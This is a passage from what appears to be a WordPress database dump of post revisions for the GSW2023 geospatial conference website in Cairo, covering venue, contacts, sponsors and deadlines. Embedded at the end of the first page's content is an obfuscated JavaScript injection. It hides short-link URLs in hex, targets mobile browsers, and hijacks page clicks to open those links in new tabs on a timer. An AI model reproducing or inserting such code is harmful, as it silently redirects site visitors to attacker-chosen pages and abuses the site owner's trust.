line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]<strong>Payment of Registration is Opened Now</strong>[/ultimate_heading][ultimate_heading main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]</p>\n<h5><span style=\"font-size: 14pt; color: #ffffff;\"><strong><a style=\"color: #ffffff;\" href=\"https://www.ihg.com/redirect?path=hd&amp;brandCode=6C&amp;localeCode=en&amp;regionCode=1&amp;hotelCode=CROHA&amp;_PMID=99801505&amp;GPC=DY8&amp;cn=no&amp;viewfullsite=true\" target=\"_blank\" rel=\"noopener\">Conference Venue Special Rate Booking is Opened Now</a></strong></span></h5>\n<p>[/ultimate_heading][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fregistration%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665287063394{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]INFORMATION[/dt_default_button][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fcontact%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665182763974{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]CONTACT US[/dt_default_button][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/2\" css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1675475943417{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]</p>\n<h2 style=\"color: #311b92; text-align: left;\"><strong> EGYPT GSW\'2023</strong></h2>\n<p>&nbsp;</p>\n<h3></h3>\n<p>[/vc_column_text][vc_column_text css=\".vc_custom_1675590910832{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]</p>\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo City stars Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity.</p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fwelcome%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1668029705082{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]Read More[/dt_default_button][/vc_column][vc_column width=\"1/2\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_single_image image=\"3162\" img_size=\"1200x1000\"][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]</p>\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\n<h4 style=\"text-align: justify; color: white;\"><strong>InterContinental Cairo Semiramis</strong></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: justify; color: cyan;\"><strong>For More Information:</strong></h4>\n<p><span style=\"font-size: 12pt;\"><strong>Contact us at: </strong><a href=\"mailto:info@gsw2023.com\"><strong>info@gsw2023.com</strong></a></span></p>\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#311b92\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_sep_col=\"#311b92\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_column_text]</p>\n<p style=\"text-align: center;\">\n<p style=\"text-align: center;\"><strong><a href=\"mailto:gsw2023@aast.edu\">gsw2023@aast.edu</a></strong></p>\n<p style=\"text-align: center;\"><strong> <a href=\"mailto:aaelbary@gsw2023.com\">aaelbary@gsw2023.com</a></strong></p>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-04-22 12:48:12','2023-04-22 12:48:12','',3066,'https://gsw2023.com/?p=4096',0,'revision','',0),
(4097,1,'2023-04-22 12:49:08','2023-04-22 12:49:08','<p>[vc_row css=\".vc_custom_1680403823446{margin-top: -35px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406603694{margin-top: 125px !important;}\"]</p>\n<h6><a href=\"https://www.bdstar.com/en/\"><img class=\"aligncenter wp-image-3987\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></a></h6>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406565735{margin-top: 50px !important;}\"]</p>\n<h3 style=\"text-align: center;\"><strong>Gold Sponsors</strong></h3>\n<p><span style=\"font-size: 8pt;\"><a href=\"http://hdmap.geomatics.ncku.edu.tw/index-US.php\"><img class=\"aligncenter wp-image-3989\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406679677{margin-top: 137px !important;}\"]<a href=\"www.applanix.com\"><img class=\"aligncenter wp-image-3988\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text]<span style=\"font-size: 8pt;\"><a href=\"https://www.tasa.org.tw/index.php?ln=en\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4089 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/logo_en_tasa2-300x63.png\" alt=\"\" width=\"300\" height=\"63\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406157694{margin-top: 88px !important;}\"]<a href=\"http://www.robotlab.com.tw\"><img class=\"aligncenter wp-image-4033 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406965583{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><strong>Bronze Sponsors</strong></h4>\n<p><a href=\"http://www.riegl.com\"><img class=\"aligncenter wp-image-3997 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681676234291{margin-top: 50px !important;}\"]<a href=\"http://www.geosat.com.tw\"><img class=\"aligncenter wp-image-4041 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Geosat-logo-300x170.jpg\" alt=\"\" width=\"300\" height=\"170\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_column_text][/vc_column_text][vc_column_text css=\".vc_custom_1675473187232{border-top-width: 25px !important;padding-top: 25px !important;}\"]</p>\n<h3></h3>\n<h3></h3>\n<h3></h3>\n<h3 class=\"fancy-title entry-title start-animation-done start-animation\" style=\"text-align: justify; color: #311b92;\"><strong>IMPORTANT DATES</strong></h3>\n<p>[/vc_column_text][vc_row_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Full paper submission (Annals): April 30, 2023 <span style=\"text-decoration: line-through;\">March 31, 2023</span> (hard deadline, no extension)</strong>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Full paper Author notification: May 21, 2023 <span style=\"text-decoration: line-through;\">May 1, 2023</span></strong>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Abstract submission (Archives):            .</strong></p>\n<p><strong><del>April 15, 2023</del> ,</strong></p>\n<p><strong> May 15, 2023  (hard deadline, no extension)</strong><br />\n<strong style=\"color: white;\">SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS</strong>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\" css=\".vc_custom_1681902149314{margin-top: -25px !important;}\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Abstract Author notification:</strong></p>\n<p><strong><del>May 15, 2023</del>, May 21, 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"5\"][vc_row_inner css=\".vc_custom_1668021047643{margin-top: 25px !important;}\"][vc_column_inner css=\".vc_custom_1668021165897{padding-top: 40px !important;}\"][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fimportant-dates%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"300\" css=\".vc_custom_1668192997249{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]ALL IMPORTANT DATES[/dt_default_button][dt_default_button link=\"url:https%3A%2F%2Fwww.conftool.com%2Fgsw2023|target:_blank\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"300\" css=\".vc_custom_1675484507520{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]SUBMIT YOUR PAPER NOW[/dt_default_button][/vc_column_inner][/vc_row_inner][/vc_column][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1668005438919{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_inner width=\"1/4\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1668204801057{margin-top: 1px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][/vc_column_inner][vc_column_inner width=\"3/4\" css=\".vc_custom_1668010702427{margin-top: 35px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668204929553{margin-top: 20px !important;}\" tick_size=\"desktop:50px;\"][/vc_column_inner][/vc_row_inner][vc_single_image image=\"3289\" img_size=\"1149x800\"][/vc_column][vc_column][/vc_column][vc_column][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" border_width=\"10\" accent_color=\"#311b92\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-vz-jquery\" 